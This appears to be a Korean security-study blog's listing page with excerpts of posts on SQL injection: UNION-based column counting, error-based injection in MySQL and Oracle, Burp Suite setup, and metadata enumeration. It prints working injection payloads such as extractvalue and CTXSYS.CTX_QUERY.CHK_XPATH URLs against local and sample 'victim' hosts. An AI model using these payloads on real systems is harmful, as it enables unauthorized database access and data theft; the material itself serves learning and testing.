목록전체 (162)
Oh! JUN
UNION 공격 검증
● 정렬 대상 컬럼에 컬럼명 대신 숫자가 올 수 있으며, 이를 통해 컬럼 개수 파악 가능 ● 정렬 대상 컬럼이 대용량 데이터 타입일 경우 정렬이 불가능하여 에러 발생 ● UNION 사용 시 상위 SELECT 문에 ORDER BY 구문이 있을 경우 에러 발생 1. 정렬 대상 컬럼에 컬럼명 대신 숫자가 올 수 있으며, 이를 통해 컬럼 개수 파악 가능 order by 1 : 첫번째 열인 seq을 기준으로 정렬 order by 2 : 두번째 열인 id을 기준으로 정렬 order by 3 : 세번쨰 열 없으니까 오류 x - 이를 통해 컬럼의 개수를 알수 있음. 2. 정렬 대상 컬럼이 대용량 데이터 타입일 경우 정렬이 불가능하여 에러 발생 http://www.victim.co.kr/boardView.do?idx=1..
UNION과 UNION ALL 차이점 실습
# 실습 세팅 create database union_test; use union_test; create table user1(seq int, id varchar(10)); create table user2(seq int, id varchar(10)); insert into user1 values(1, 'admin'); insert into user1 values(2, 'test1'); insert into user1 values(3, 'test2'); insert into user2 values(1, 'admin'); insert into user2 values(2, 'test2'); insert into user2 values(3, 'test3'); 1. union 실습 select * from us..
효과적으로 DBMS 에러를 발견하기 위한 방법(설정)
{ "val1":"test1", "val2":"test2" } contentType이 application/json으로 되어있을경우 burp에서 json 데이터를 인식하지 못한다. 그래서 burp에서 Edit response interception rule에서 Match condition에 추가시켜야한다. { "val1":"test1", "val2":"test2" } 정상적으로 인터셉트 한걸 확인할 수 있다.
ORACLE ERROR-BASED 공격 실습
※ 공격 가능한 패키지 ORDSYS.ORD_DICOM.GETMAPPINGXPATH('crehacktive') CTXSYS.DRITHSX.SN(1,'crehacktive') CTXSYS.CTX_QUERY.CHK_XPATH('crehacktive',1) ORDSYS.ORD_DICOM.GETMAPPINGXPATH((select+banner+from+v$version+where+rownum=1)) CTXSYS.CTX_QUERY.CHK_XPATH((select+banner+from+v$version+where+rownum=1),1) CTXSYS.CTX_QUERY.CHK_XPATH((select+banner+from+v$version+where+rownum=1),1) 1. 기본 정보 목록화 => 버전, 사용자, S..
MYSQL ERROR-BASED 공격 실습
1. 기본 정보 목록화(DB버전, 사용자, 현재 DB명) @@version/version(), system_user(), database() http://127.0.0.1/board/mysql/view.php?idx=extractvalue(0x0a,concat(0x0a,@@version,0x0a)) - DB버전 http://127.0.0.1/board/mysql/view.php?idx=extractvalue(0x0a,concat(0x0a,system_user(),0x0a)) - DB 유저 정보 http://127.0.0.1/board/mysql/view.php?idx=extractvalue(0x0a,concat(0x0a,database(),0x0a)) - DB 이름 2. 메타 데이터 목록화 2-1. 순차..
ORACLE 메타데이터 목록화
ORACLE - 사용자 단위로 테이블이 구분이 되어있음 - DB가 나누어져 있지 않음 DBA_TABLES / DBA_TAB_COLUMNS : 데이터베이스의 모든 테이블 / 컬럼 정보(DBA 권한) ★ ALL_TABLES / ALL_TAB_COLUMNS : 현재 사용자가 접근 가능한 모든 테이블 / 컬럼 정보 USER_TABLES / USER_TAB_COLUMNS : 현재 사용자가 생성 / 소유하는 테이블 / 컬럼 정보 순차적 목록화 select * from all_users; - 모든 사용자를 조회한다. - ORACLE은 MYSQL처럼 DB가 여러개 존재하지 않고, 사용자와 테이블과 매핑되어있다. select DISTINCT owner from all_tables; - 모든 테이블에서 owner를 중복제..
MYSQL 메타데이터 목록화
메타 데이터란 무엇인가? "데이터에 대한 데이터로 자료 그 자체가 아닌 자료의 속성 등을 설명하는 데이터" 데이터의 종류가 많아지면서 이를 정리하기 위해 목록화 시킬 필요성을 느꼈다. 순차적 접근(전체 테이터 목록화) - 장점 : 중요 정보(데이터) 놓칠 가능성이 낮음 - 단점 : 높은 시간 소요 / 높은 트래픽 발생 비순차적 접근(특정 데이터 목록화) - 장점 : 낮은 시간 소요 / 낮은 트래픽 발생 - 단점 : 중요 정보 놓칠 가능성이 높음 select * from information_schema.schemata (db조회) select * from information_schema.tables (table 조회) select * from information_schema.columns (colum..